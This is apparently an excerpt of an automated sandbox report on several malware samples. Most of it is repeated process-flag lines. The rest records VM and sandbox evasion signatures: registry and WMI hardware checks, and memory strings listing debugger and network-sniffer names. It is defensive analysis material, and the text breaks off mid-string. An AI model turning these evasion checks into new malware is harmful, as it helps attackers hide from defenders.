Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: 4854.exe PID: 7792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 928F.exe PID: 5408, type: MEMORYSTR

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\srvwauv	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\srvwauv	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\srvwauv	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\srvwauv	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\srvwauv	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\srvwauv	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\AppData\Local\Temp\CFAA.exe

File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003780000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
Source: srvwauv, 00000003.00000002.1918447919.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, toolspub2.exe, 00000011.00000002.2145030840.000000000051B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: uVQLD8YVk6.exe, 00000000.00000002.1676573024.0000000000580000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKW
Source: etopt.exe, 00000019.00000002.2903789358.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SNIFFERPRO.EXECHARLES.EXEIRIS.EXEHTTPDEBUGGERPRO.EXESRSNIFFER.EXEOSTINATO.EXEWPE.EXEWSOCKEXPERT_CN.EXEWSOCKEXPERT.EXESMARTSNIFF.EXEHOOKME.EXENETWORKTRAFFICVIEW.EXETCPMON.EXESMSNIFF.EXEHTTPANALYZERSTDV7.EXEHTTPANALYZERSTDV6.EXEHTTPANALYZERSTDV5.EXEHTTPANALYZERSTDV4.EXECSNAS.EXEOLLYICE.EXEOLLYDBG.EXEWINDBG.EXESOFTICE.EXEWIRESHARK.EXEFIDDLER.EXE%08X%08XROOT\WMIMSSMBIOS_RAWSMBIOSTABLESSMBIOSDATANULL STRINGVIRTUALVIRTUALPACKIDMIDSIDMAC1MAC2BOARDMANUSNPRODUCTCPUNAMECORENUMSYSMAJORMINORBUILDRELEASEX64NOTEPADVMADMINPOWERONLOCALESOFTWARE\CHROMIUMLOCINFOSTSDQUERYLOCATIONCOUNTRYPROVINCECITYISPCOUNTYLONLATCLTINFOINSTCANDENYAPPKEYDENYAPPSSUCCNEEDRESPUNINSTAPPACTIVESOFTWARE\BAIDU\BDLOGCUR_VERSIONVMTOOLSD.EXEWMACTHLP.EXEC:\XWSGCZYJBR(%XHUX%HUX%HU)
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003780000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003780000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTART TASK: %WSTOPM 